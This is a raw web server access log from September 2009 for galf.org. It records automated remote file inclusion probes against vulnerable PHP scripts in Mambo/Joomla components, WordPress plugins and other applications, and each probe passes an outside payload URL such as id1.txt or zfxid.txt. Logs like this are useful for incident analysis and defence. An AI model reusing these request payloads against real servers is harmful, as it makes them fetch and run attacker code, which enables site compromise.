218.27.203.107 - - [28/Sep/2009:00:51:09 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:51:09 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:51:29 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:51:29 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:51:29 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:52:53 -0700] "GET /logs/access_090323.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:53:49 -0700] "GET /logs/access_090323.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:54:22 -0700] "GET /logs/access_090323.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:00:54:39 -0700] "GET /logs/access_090420.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:00:54:39 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:00:54:39 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [28/Sep/2009:00:54:47 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [28/Sep/2009:00:54:47 -0700] "GET /logs/access_090511.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [28/Sep/2009:00:54:47 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:54:52 -0700] "GET /logs/access_090518.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:54:52 -0700] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:54:52 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:55:03 -0700] "GET /logs/access_090518.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:55:03 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:55:03 -0700] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:55:26 -0700] "GET /index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:55:28 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:55:29 -0700] "GET /logs/access_090622.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [28/Sep/2009:00:55:33 -0700] "GET /logs/access_090601.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:00:56:25 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [28/Sep/2009:00:56:25 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [28/Sep/2009:00:56:26 -0700] "GET /logs/access.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:59:34 -0700] "GET /logs/access_090518.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:59:34 -0700] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:59:34 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:00:27 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:00:27 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:00:27 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:01:01:12 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:01:01:12 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:01:01:12 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:01:01:33 -0700] "GET /logs/access_090323.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:01:01:45 -0700] "GET /logs/access_090323.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:01:56 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:02:17 -0700] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.142.142 - - [28/Sep/2009:01:02:30 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.232.104.221 - - [28/Sep/2009:01:03:02 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.232.104.221 - - [28/Sep/2009:01:03:02 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.232.104.221 - - [28/Sep/2009:01:03:02 -0700] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.232.104.221 - - [28/Sep/2009:01:03:09 -0700] "GET /logs/access_090720.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:03:28 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:03:28 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:03:29 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 4805 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:03:41 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:03:41 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:03:42 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 200 4805 "-" "libwww-perl/5.79" "www.galf.org"
165.194.232.107 - - [28/Sep/2009:01:04:23 -0700] "GET /logs/access_090420.log/skin/zero_vote/ask_password.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:01:05:34 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:01:05:34 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:01:05:37 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:05:55 -0700] "GET /logs/access_090420.log//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:05:55 -0700] "GET /errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:05:55 -0700] "GET /logs//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:06:07 -0700] "GET /logs/access_090420.log//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:06:08 -0700] "GET /errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:01:06:08 -0700] "GET /logs//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:06:20 -0700] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:01:06:23 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:01:06:23 -0700] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:01:06:26 -0700] "GET /logs/access_090518.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:06:49 -0700] "GET /logs/access_090622.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:06:49 -0700] "GET /index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:07:01 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:07:24 -0700] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:01:08:54 -0700] "GET /logs/access_090420.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:01:09:29 -0700] "GET /logs/access.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [28/Sep/2009:01:10:57 -0700] "GET /index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:11:10 -0700] "GET /logs/access_090622.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:11:10 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [28/Sep/2009:01:12:50 -0700] "GET /logs/access_090420.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.234.62.129 - - [28/Sep/2009:01:13:06 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.234.62.129 - - [28/Sep/2009:01:13:06 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.234.62.129 - - [28/Sep/2009:01:13:06 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [28/Sep/2009:01:13:35 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:14:37 -0700] "GET /index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:14:37 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:14:39 -0700] "GET /logs/access_090622.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:16:46 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:17:17 -0700] "GET /index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:17:29 -0700] "GET /logs/access_090622.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:17:29 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [28/Sep/2009:01:18:20 -0700] "GET /logs/access_090518.log/?sourcedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [28/Sep/2009:01:18:20 -0700] "GET /?sourcedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [28/Sep/2009:01:18:20 -0700] "GET /logs/?sourcedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:01:18:24 -0700] "GET /logs/access_090323.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:01:19:12 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:01:19:12 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:01:19:12 -0700] "GET /logs/access_090608.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [28/Sep/2009:01:19:42 -0700] "GET /logs/access_090810.log/?sourcedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:01:19:50 -0700] "GET /logs/access_090615.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:20:39 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.102.204.130 - - [28/Sep/2009:01:20:42 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.102.204.130 - - [28/Sep/2009:01:20:42 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
117.102.204.130 - - [28/Sep/2009:01:20:42 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:22:11 -0700] "GET /logs/access_090629.log%20%20//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.102.204.130 - - [28/Sep/2009:01:22:56 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:01:25:38 -0700] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:01:25:38 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:01:25:38 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:01:25:50 -0700] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:01:28:08 -0700] "GET /logs/access_090608.log////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:01:28:22 -0700] "GET /logs/access_090615.log////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:30:21 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:30:21 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:30:21 -0700] "GET /logs/access_090316.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:30:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:30:28 -0700] "GET /logs/access_090420.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:30:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:31:04 -0700] "GET /logs/access_090316.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:01:31:31 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:01:31:31 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:01:31:31 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:01:31:33 -0700] "GET /logs/access.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:01:31:33 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
